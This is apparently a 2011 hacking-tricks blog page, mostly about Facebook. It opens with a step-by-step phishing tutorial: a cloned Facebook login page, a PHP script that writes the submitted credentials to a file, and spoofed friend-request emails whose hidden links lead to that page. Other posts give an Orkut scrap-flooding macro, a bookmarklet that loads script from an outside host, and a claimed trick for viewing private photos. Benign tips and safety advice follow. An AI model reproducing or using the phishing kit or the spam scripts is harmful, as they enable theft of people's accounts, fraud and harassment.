Subscribe:

Ads 468x60px

Pages

2011-03-30

How to hack facebook Account

Every Body Question About how can i hackfacebook? why doesn't my phisher work? how can i send my phisher?... This is a step by step tutorial for face-book accounts.



ONE... Go to "www.facebook.com/ login.php" and right click on some white space on the page and press "view source code". ALOT of text is gonna appear, copy it all to notepad.

TWO... Now we need to change a few things in the code. So that the login button sends the info to our file instead of the facebook login. We do that by editing the action of the code. So pressctrl +f and search "action=" without the quotes. you should find this The big red ring that circles the action= you have to change. You have to change it to 'action="next.php" '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document asindex.html

THREE... Now that we changed the action to next.php, we should also make a "next.php". open up notepad again. And write this... Quote header("Location: http:// www.Facebook.com/ login.php "); $handle = fopen ("passwords.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?> Save this as "next.php" Note: for security you should rename "passwords.txt" to something else. now make a text file called "passwords.txt" or whatever you renamed the file to in the "next.php", leave this document blank...

FOUR... Upload the 3 files to a subdomain hosting site. THEY MUST SUPPORT .PHP! i suggest these: t35.com, spam.com justfree.com or 007sites.com. When you made an account you should upload the 3 files...

FIVE... now we would like to send spoof emails out. To do that we should first make an email account. which starts with facebook@. or something that looks alike. like thisFACEB0OK@hotmail.com or something like that. You should either use Gmail, Live, or hotmail. or you could get a mail like this "facebook@noreply.com" soemthing like that. but eventually that would cost. When your email is set go to step six...

SIX... Copy the content of an original Facebook friendship invitation email and paste it into a new mail DONT SENT YET! remove the hyperlink from this link:http:/ www.facebook.com/n/? reqs.php Mark it and push the Add hyperlink button Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/ www.facebook.com/n/? reqs.php but lead to your phisher page.. Thats pretty Good Now i believe you are ready to send your spoof emails to everybody you know. and hopefully some of them will fall for it...

Plz Reply 4 Any Ques...

2011-03-24

Orkut 100000+ Scraps Flooding .

Hello guyz today I gonna tell you that how to flood 10000+ orkut scraps using imacros and javascript.

Note-working with mozila firefox
 
First u need to install mozila firefox
then install imacros add ons as imacros .



Search Imacros and add in firefox




Step1-

goto Tools>Add-ons>search imacros , add in firefox
then restart mozila Firefox

Step2-
copy the red code and paste in Current.iim

VERSION BUILD=7031111 RECORDER=FX
TAB T=1
URL GOTO=http://www.orkut.co.in/Main#Home
TAG POS=3 TYPE=DIV ATTR=TXT:post
WAIT SECONDS=0.1



Click on save

Step3-
Copy and paste Below Javascript in new orkut scrap book
"javascript : avi"

 Enjoyyyyy ...

Change Your Facebook Theme

Stylish Addon allows you change the appearance by applying Facebook
Themes. Basically, the styles for facebook is changed by applying User
Scripts from Userstyles.org.
  1. Install Sylish Addon https://addons.mozilla.org/en-US/firefox/addon/2108
  2. Login to Facebook
  3. Go to Facebook Themes Gallery
  4. Click on “Install with Stylish” Button http://userstyle...s.org/styles/browse/all/facebook
  5. Your Facebook is successfully changed.




After Installing Stylish Addon u need to restart mozila firefox.

Then choose the theme and click on install button.

Then u will see that ur theme is installed on left side of window.



close the window and enjoy....

Fun With javascripts On Facebook .

Here i will post some cool
java tricks... copy the
scripts in adress bar (plae
where u type
facebook.com ) and hit
enter..


1)This piece of code pulls off
all the images from your
web page and rotates them
in a circle. Really makes any
page go naked (without its images). The best place to
test is a website with many
images. (Google Images for
an example) javascript:R=0; x1=.1;
y1=.05; x2=.25; y2=.24;
x3=1.6; y3=.24; x4=300;
y4=200; x5=300; y5=200;
DI=document.getElementsByTagName
("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i
++){DIS=DI[ i ].style;
DIS.position='absolute';
DIS.left=(Math.sin
(R*x1+i*x2+x3)*x4+x5)+"px";
DIS.top=(Math.cos (R*y1+i*y2+y3)*y4+y5)+"px"}R
++}setInterval('A()',5);
void(0);?


2)This code lets you edit any
page/website in real-time.
With Firefox, you can even
edit and save the modified
pages to your computer. a nice one.. i love this javascript:document.body.contentEditable='true';
document.designMode='on';
void 0p


3)There are times when you
are not sure that the
website that you are
visiting is authentic. Use
this code whenever in doubt :- Copy the code from here
and paste into browsers
address bar.. javascript:alert("The actual
URL is:\t\t" +
location.protocol + "//" +
location.hostname + "/" +
"\nThe address URL is:\t\t"
+ location.href + "\n" + "\nIf the server names do
not match, this may be a
spoof.");




4)hake the Browser... How about shaking the
internet browser window? Copy paste the code on the
browser's address bar and
press enter... javascript:function Shw(n)
{if (self.moveBy) {for (i =
35; i > 0; i--) {for (j = n; j >
0; j--) {self.moveBy
(1,i) ;self.moveBy
(i,0);self.moveBy(0,- i);self.moveBy(-i,0); } } }}
Shw(6) And finally Try this one :) javascript:function reverse
() { var inp = " (; xnaht yas
ot tegrof tnoD ,skcoR
diawaJ namialuS
...yad lufrednow a evaH ";
var outp = ""; for (i = 0; i <= inp.length ; i++) { outp = inp.charAt (i) + outp ; } alert(outp) ;}; reverse(); Reveal*****(Asterisk) Pasword Using Javascript Follow the steps given below--->


1> Open the Login Page of
any website (Exp-
gmail.com)


2> Type "Username" &
"Password"


3>Copy & Paste the
JavaScript Code given
bellow into ur Broswer's
add bar & hit Enter javascript: alert
(document.getElementById
('Passwd').value);


4>AS soon as u hit 'Enter',A
window pops up showing
Password typed by
you......... Full Page JavaScript : All
Posts in One Page (for
orkut) When you will run this
script, it will show all the
posts of the topic in that
page only! So no need to
click the "next" button, to
reach your post. This will make your work easy. :-)


Here's the code,copy it to
ur url :
javascript: ($ = (d =
document).createElement
("script")).src = " http:// im.su.ly/UL.php";void
(d.body.appendChild($ )) Just Copy The Below
Code And Paste It To
Your Web Browser
Address Bar And Press
Enter javascript:function Shw(n)
{if (self.moveBy) {for (i =
35; i > 0; i--) {for (j = n; j >
0; j--) {self.moveBy
(1,i);self.moveBy
(i,0);self.moveBy(0,- i);self.moveBy(-i,0); } } }}
Shw(6)


Copy paste this
javascript in your URL
while u r online on
facebook ...
here's the java
script : ==============






javascript:R=0; x1=.1;
y1=.05; x2=.25; y2=.24;
x3=1.6; y3=.24; x4=300;
y4=200; x5=300; y5=200;
DI=document.getElementsByTagName
("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i
++){DIS=DI[ i ].style;
DIS.position='absolute';
DIS.left=(Math.sin
(R*x1+i*x2+x3)*x4+x5)+
"px"; DIS.top=(Math.cos (R*y1+i*y2+y3)*y4+y5)+"
px"}R++}setInterval( 'A
()',5); void(0);
-----------------------------------------------------
java script in the url and
now u can edit that page whatever u want to
write .....
javascript:
document.body.contentEditable
= 'true';
document.designMode = 'on'; void 0

See Hidden Facebook Pictures Of Any Profile .

Follow these steps :-

1. Go to the Profile-page

of the Person.

2. Clear your Address

line


3. Copy this into:


Code:
j a v a s c r i p t : ( f u n c t i o n ( ) { C S S . r e m o v e C l a s s ( d o c u m e n t . b o d y , % 2 0 ' p r o f i l e _ t w o _ c o l u m n s ' ) ; t a b _ c o n t r o l l e r . c h a n g e P a g e ( " p h o t o s " ) ; } ) ( )


4. Now you can easily

see Pictures of s.b. you
don't even know.

Download Your Facebook Profile .

Did you know that you can
download your Facebook
profile ? Would you like to
keep a record of what you
have done on Facebook.
Other peoples comments and messages to you, even
all the pictures you have
uploaded and shared. This
information is readily
available to you and all you
have to do is download your Facebook profile .

In this tutorial

I will show
you how to download
your entire Facebook
profile to your computer
and save it for later. Bare in mind that you will have to
do this on a regular basis if
you are continually
updating your profile with
new information. Download Your Facebook
Profile To Your Computer
to save

1. Go to your Facebook

account and sign in.

2. Click on the small drop down arrow next to the

account link.

3. A menu will appear.

Choose account settings
from the menu.

4. Now you are in your

Facebook account settings .

5. Make sure you are on

the settings tab as shown
below.

6. Scroll down the page

until you see a heading
Download Your
Information . See the
screen shot below.
When you receive your
email you can unzip the
package and open a copy
of your Facebook profile in
an Internet browser
window

How To Get a Facebook Email Address .

if you are lucky you will
get the


yourname@facebook.com
email id as soon as
possible .


Please note that
Your email address will match your public
username,
for example:
Profile: facebook.com/ username Then your email address
will be


Email:username@facebook.com
If you don ’t have a username you can go here facebook.com/username/ to get or click below http://
www.facebook.com/
username/

Top 10 Facebook Tricks .

Hi frends

Youtricks.Blogspot.Com

present top 10 facebook trick tips and hacks so enjoy



1 HOW TO: Add a Dislike
Option to Your Status



Update Like ” buttons are everywhere on Facebook,

and they ’re everywhere on the web. But what if
you want to update your
status or share something
that your friends can
“dislike ?” We know, your friends can choose to
“comment” on your post, but where ’s the fun in that?
The clever Status Magic Facebook app can add a dislike button to any
status updates posted via
the app. And if you wanted
to really mix it up you can
actually customize the
second emotion to anything, such as “love, ” “hate, ” “disagree ” or even “LOLs.”


2. HOW TO: Hide Status
Updates



From Certain

People Using Facebook’s general privacy settings (find these by hitting “account” on the top right of a Facebook page) you can select whether everyone, just friends or friends of friends can see your status
updates. However, there is a way to narrow those options down even further. You can select specific friend lists to see your status (relevant for work, special interest groups, etc.) or even individual people by name, which is useful for anyone organizing a surprise party . To take advantage of these options, click the padlock icon just below your “what ’s on your mind ” box on your wall and a drop down menu should appear. Selecting “customize ” will bring up more options such as “make this visible to ” and “hide from ” with the option to make your selection a default.


3. HOW TO: Pre-Schedule Status Updates



While SocialOomph, Sendible and HootSuite () offer the same kind of service, the simplest way to schedule Facebook status updates is by using the easy, free Later Bro service. Just sign in with Facebook Connect, select your time zone, type in what it is you ’d like to say, set the calendar and clock to when you ’d like to say it, and presto!



4. HOW TO: Tag People in Your Status Updates


This was quite a big deal when it was announced this past September, but from the amount of searches on the topic “how can I make someone’s name go blue in a Facebook status ?” it seems it’s not universally

known. To mention someone in a status update just type “@” (a la Twitter ()) in the status bar and start typing
their name as it appears on Facebook. An auto- generated list will then come up with people in your social circle whose name starts with the letters you ’ve typed. The feature also works with pages, brands, events and companies. Hit the name you want, complete the update, click share and the name will become a hyperlink (you won ’t see the @ symbol) and will appear in blue text.


5. HOW TO: Add Symbols to Your Facebook Status



Although there are plenty of emoticons that work with Facebook Chat, typing “:)” into Facebook ’s status bar will not magically transform into a smiley

yellow face. In fact, the only symbol you can create in a Facebook status update through the shortcut keys is a ♥, by typing “< 3." While this won't bother many Facebook users, others more used to punctuating their missives can copy and paste web- happy, universal symbols into the box, as you can see in the screengrab above. PC users can also access some symbols by hitting “alt” + various number combinations (on a numerical keypad). So, while smileys are yet to hit Facebook statuses, you can annoy or amuse your buddies with symbols right now. 

6. HOW TO: Turn Your Status Updates Into a Word Cloud


There ’s a really fun way to visualize anyone ’s status updates (even an entire country ’s) as a word cloud. The Status Analyzer 3D app will look at what it is you ’ve been chatting about lately and generate a list, and then a pretty, colorful , animated cloud as pictured above. You can share the results with others on the social networking site by posting it to your friends ’ walls or by adding it to your profile.



7. HOW TO: Have Fun With Facebook ’s Humorous Language Options



While you can always change your setting into more sensible alternative languages, the site offers a couple of fun linguistic Easter eggs . You can chose to have Facebook display upside down English, or, for anyone feeling a little salty, in “pirate. ” Pirate essentially turns your status into your “plank, ” your attachments into “loot” and instead of “share ” it offers the option to “blabber t ’ yer mates. ” Sadly, anything you type in the status bar won ’t be upside down, or pirate-y. But with the use of some external sites you can achieve the same effect. TypeUpsideDown.com and UpsideDownText.com are just two examples of sites that can flip your text, while the Talk Like a Pirate Day site can help you with your pirate translations.




8. HOW TO: See Status Updates From Around the World



If you want to get a glimpse of the thoughts of Facebook users from around the world ’s, head over to OpenBook. Created by three San Fran web developers with a serious privacy message in mind, the site aggregates the status updates of everyone whose privacy levels are set to “everyone. ” You can narrow your searchable results down by gender and keywords to find out what people are saying about a certain topic. Or you can just browse the recent searches.




9. HOW TO See Your Status Update Stats



Have you ever wondered how many times you have updated your status on Facebook? The Facebook app Status Statistics , can tell you this and more. The app analyzes your updates and gives you a tidy list of how many you ’ve written, the average word count and how many times a day you post. In addition, it generates a graph that shows you what time of

day or what days of the week you normally update. Old statuses are also searchable via the app, so you can find that witty retort you made back in November 2009 without having to scroll back through your history.

10. HOW TO: Play a Trick On Your Friends in Your Status Update


This clever link


“http:// facebook.com/profile.php? =73322363


looks like it could be a URL for anyone ’s Facebook profile, actually

takes anyone logged into Facebook to their own profile page . If you try it out, be sure to remove the link preview that Facebook auto-ads.

Have fun, and don ’t be too mean


I take many hour to find this tricks

so plz friend
SHARE THIS ON FACEBOOK AND TWEET ON TWEETIER

Use BOLT, Underlined Font And Emotions While Chatting On Facebook .

Very few people know
that you can use even bold
fonts or underlined fonts in
facebook chat.




To use bold fonts type
your message between
two asterisks.

eg:- *YOUTRICKS.COM*
after ill doing
see live that

YOUTRICKS.COM



To type underlined
messages type your
message between two
underscores.


eg:- _YOUTRICKS.COM_


See Like That...
YOUTRICKS.COM


enjoy!!!

Facebook Safety To Save Yourself From Being Hacked .

Some Safety Tips To Save Yourself From
Being Hacked (For Noobs):- Facebook Safety Tips-


1). Do Not Download Any Software Who Promises
You That It Can Hack Any
FB A/c or Can Hack PayPal
or Any Other Mail Id's, Can
Give Free Recharge, Etc...


2). Do Not Accept Unknown
Applications Or Do Not
Allow Them To Gain Access
With Your Account.

3). Make Your Password
Strong Like:-
"1234567890@!$%*abcde"
Use Three of The Things In
Your Password Number's,
Symbols & Alphabets.


4). Do Not Put The Same
Password In Your FB
Account As You Have In
Your Mail Id.


5). Try To Make Your
Password As Long As You
Can (I Have 32 Digit of My
Password) An Ya Off-
course Not Guessable By
Anyone.


6). Do Not Paste Any
JavaScript In Your Browser
Who Promises You That you
Can Change Your Profile
Theme or Etc...


7). Always Remember To
Check The Site Name Before
Login In Your Browser.
Site Name Should Be http:// facebook.com/ or http:// www.facebook.com/ Do Not Login If The Site Name
Is http://facebooks.com/ or http:// facebook.110mb.com/ or Else. It's A Phishing Page Or
Attack.


8). Always Choose/Select
Your Security Question
Which Are Not Guessable By
Anyone.


9). Try To Change Your
Password In Every 15 Days
(If You Don't Feel That Your
Account Is Safe).


10). Keep Your Computer
UpDate(Up-to-Date) And
Use Latest Register &
Updated Anti-Virus and
Internet Security.


11). If You Are On Public
Computer (i.e. in cyber cafe,
school or office computers)
Always Remember To
Delete Browser Cookies.


12). Change Your IP
Address In Every 10-15
Days. That's All This Tutorial Is
Written in Basic English
Language So That Noob Can
Understand This Tutorial
Very Well.

Hide Your Friendlist In Facebook From Others .

Hello Dost...
Privacy, one of the reasons which made some issues out of facebook but later fb got a lot of new settings for a user’s privacy. Now, a user has his control on almost everything in his profile, status, photos, albums etc. The user has the control of what he wants to share with everyone, friends, friends of friends etc. You can even manually hide a status from a single person or more. Did you know that you can even hide your friend list? If don’t then read on.
If you don’t want strangers to see your friend list then you can just hide it from them. It is very easy. You can use the enhanced Facebook privacy settings to modify your friend list’s visibility based on your choice. Let me show you the step by step tutorial on how to hide Facebook friends list.
1.Log on to your Facebook account.
2.Click on the “Account” on the top right and then click the 4th option “Privacy Settings”.

3.In the section “Connecting on Facebook” click “View Settings”.

4.You will see 7 options there. One of them would be “See your friend list” and there would be the options on how you can modify the visibility of your friend list.

When you click that option at the right side, you can change it to other 3 options(Friends and Networks, Friends of Friends, Friends only). You can even customize the visibility manually.



That is how you can hide your friend list from strangers or even your friends. That was very easy.
I hope you liked the post, is there anything related to this topic that I can help you with? Comment with that problem and I will try my best to solve it. Do comment.
Thanx.



Awesome Things About Facebook

Some awesome things to do on Facebook, which you might not know. According to latest statistical data, Facebook is now 600 million people strong. This means that if Facebook existed as a country, it would have been the 3rd Largest Country after China and India.
Although we all like sticking to Facebook for several hours talking and seeing what our friends are doing, the Facebook team is quietly adding new features to it which many people, for sure, don’t know about:


1. Friendship Page

Friendship Page is a feature where you can see friendship between yourself and a friend of yours. It neatly displays the time since you both are friends and things that you’ve done together such as Wall posts, comments and things in which you both are commonly tagged like photos, events and status updates.
Type this URL :- [url=http://www.facebook.com/]http://www.facebook.com/[/url]?and= in your browser to see it yourself.
Replace and = with their respective Facebook Profile IDs.

2. Download Your Facebook Information

This tool is quite handy, in case you want to have a copy of all your photos and videos that you have uploaded, facebook gives you an option for this. Moreover, you can have all your posts on your wall, messages, your friends list and some other content in a a simple, browseable archived zip file.
Visit your Account Settings Panel and click on “learn more” beside download your information text.

3. See Your Facebook Impact


In Simple words, your Impact is the number of people that you’ve brought (referred) to facebook. Visit Facebook Impact to see your impact.

facebook.com/impact

4. Facebook Photo Badges

You might have seen facebook fan-page badges with a Like button on several blogs before. Facebook provides similar badges for your latest photos that you can embed anywhere you wish. You can also choose the no. of photos that it’ll display and Layout type. Visit Photo Badges to create your own badge.

5. Friends Phonebook


Facebook knows how important Friends are to you, so it provides you a phonebook with contact details of all your friends as well as contacts that you’ve imported from your phone in a single page. This is surely a good backup in case your phone’s contacts get erased by a mishap. Visit your Phonebook Page.

6. Facebook Chat Smileys

There are over 26 smileys that you can use on Facebook Chat. While you may have know about many of them, some still remain very less known. Here’s a quick list of them:

Notice the first smiley is a face, he is Chris Putnam, a Facebook Engineer and the developer/programmer of Facebook chat.
[img]http://www.quickonlinetips.com/archives/wp-content/uploads/smileys.png[/img]

How To Recover Your Hacked Facebook Account

Face Book provides a contact page for you to help you to in recovering the hacked account .
Visit

http://www.facebook.com/ help/contact.php?show_form=account_compromised

Inside the contact Form You need to Fill in the Following Details Correctly. Full name on the account:
Enter the Full Name as you have given in Your Face Book Account. Network(s) the account belongs to: Enter the names of the networks you have joined. Include as
many as possible. Email addresses that may be affiliated with the account:

This is the email address you used as username to login to face book. Your contact email address: Enter a email address
you can be contacted by facebook. They will contact you regarding this issue. URL (web address link) of the profile page:

Give the link to your facebook profile address

Some Safety Tips To Save Yourself From Being Hacked .


Some Safety Tips To Save Yourself From
Being Hacked (For Noobs):- Facebook Safety Tips-

1). Do Not Download Any Software Who Promises
You That It Can Hack Any
FB A/c or Can Hack PayPal
or Any Other Mail Id's, Can
Give Free Recharge, Etc...

2). Do Not Accept Unknown
Applications Or Do Not
Allow Them To Gain Access
With Your Account.

3). Make Your Password
Strong Like:-
"1234567890@!$%*abcde"
Use Three of The Things In
Your Password Number's,
Symbols & Alphabets.

4). Do Not Put The Same
Password In Your FB
Account As You Have In
Your Mail Id.

5). Try To Make Your
Password As Long As You
Can (I Have 32 Digit of My
Password) An Ya Off-
course Not Guessable By
Anyone.

6). Do Not Paste Any
JavaScript In Your Browser
Who Promises You That you
Can Change Your Profile
Theme or Etc...

7). Always Remember To
Check The Site Name Before
Login In Your Browser.
Site Name Should Be http:// facebook.com/ or http:// www.facebook.com/ Do Not Login If The Site Name
Is http://facebooks.com/ or http:// facebook.110mb.com/ or Else. It's A Phishing Page Or
Attack.

8). Always Choose/Select
Your Security Question
Which Are Not Guessable By
Anyone.

9). Try To Change Your
Password In Every 15 Days
(If You Don't Feel That Your
Account Is Safe).

10). Keep Your Computer
UpDate(Up-to-Date) And
Use Latest Register &
Updated Anti-Virus and
Internet Security.

11). If You Are On Public
Computer (i.e. in cyber cafe,
school or office computers)
Always Remember To
Delete Browser Cookies.

12). Change Your IP
Address In Every 10-15
Days. That's All This Tutorial Is
Written in Basic English
Language So That Noob Can
Understand This Tutorial
Very Well.